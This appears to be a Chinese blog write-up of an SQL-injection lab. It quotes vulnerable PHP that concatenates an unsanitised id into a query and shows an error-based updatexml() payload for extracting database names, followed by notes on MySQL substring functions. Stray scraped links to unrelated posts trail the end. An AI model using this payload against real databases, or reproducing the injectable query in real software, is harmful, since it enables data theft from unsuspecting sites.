源码(单引号闭合但是没有回显)
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);if($row){echo '<font size="5" color="#FFFF00">'; echo 'You are in...........';echo "<br>";echo "</font>";}else {echo '<font size="3" color="#FFFF00">';print_r(mysql_error());echo "</br></font>"; echo '<font color= "#0000ff" font size= 3>'; }
}else { echo "Please input the ID as parameter with numeric value";}?>updatexml注入
UPDATEXML(xml_data, '//order[@id="123"]/customer', 'Jane Roe')
updatexml(1,concat(0x7e,(),0x7e),1)UPDATEXML() 函数用于在 XML 文档中更新特定节点的值。它接受三个参数:
-
要更新的 XML 文档:这通常是一个包含 XML 数据的列或变量。在上述示例中,
xml_data列存储了 XML 文档。 -
XPath 表达式:这是用于定位要更新的节点的路径表达式。XPath 是一种用于在 XML 文档中导航和选择节点的语言。在示例中,
'//employee[@id="1"]/department'是一个 XPath 表达式,它选择了所有具有id属性值为1的employee节点的department子节点。 -
新的值:这是要设置给选定节点的新值。在示例中,
'Operations'是要设置的新部门名称。
xpath出现特殊字符会报错;
如果是~则报如下错:XPATH syntax error: '~'
注:0x7e就是~
该报错最多回显32个字符(所有要截取)
payload
?id=1' and updatexml(1,right(concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),32),3)--+1、left(201809,4)截取左边的4个字符
SELECT LEFT(201809,4) //结果:20182、right(name,2)截取右边的2个字符
SELECT RIGHT(201809,2) //结果:093、SUBSTRING(name,5,3) 截取name这个字段 从第五个字符开始 只截取之后的3个字符
SELECT SUBSTRING('成都融资事业部',5,3) //结果:事业部4、SUBSTRING(name,3) 截取name这个字段 从第三个字符开始,之后的所有个字符
SELECT SUBSTRING('成都融资事业部',3) //结果:融资事业部5、SUBSTRING(name, -4) 截取name这个字段的第 4 个字符位置(倒数)开始取,直到结束
SELECT SUBSTRING('成都融资事业部',-4) //结果:资事业部6、SUBSTRING(name, -4,2) 截取name这个字段的第 4 个字符位置(倒数)开始取,只截取之后的2个字符
SELECT SUBSTRING('成都融资事业部',-4,2) //结果:资事
注意:我们注意到在函数 substring(str,pos, len)中, pos 可以是负值,但 len 不能取负值。7、substring_index('www.baidu.com', '.', 2) 截取第二个 '.' 之前的所有字符
SELECT substring_index('www.baidu.com', '.', 2) //结果:www.baidu8、substring_index('www.baidu.com', '.', -2) 截取第二个 '.' (倒数)之后的所有字符
SELECT substring_index('www.baidu.com', '.', -2) //结果:baidu.com9、SUBSTR(name, 1, CHAR_LENGTH(name)-3) 截取name字段,取除name字段后三位的所有字符
SELECT SUBSTR('成都融资事业部', 1, CHAR_LENGTH('成都融资事业部')-3) //结果:成都融资10、mid(str,start,[length])
str:截取的字符串 start:起始位置 length:截取的长度,可以忽略
)
)
)
:pytest库安装)
![[TS面试]TypeScript 中 any, nerver, unknown, null undefined 和 void 有什么区别?](http://pic.xiahunao.cn/[TS面试]TypeScript 中 any, nerver, unknown, null undefined 和 void 有什么区别?)
)
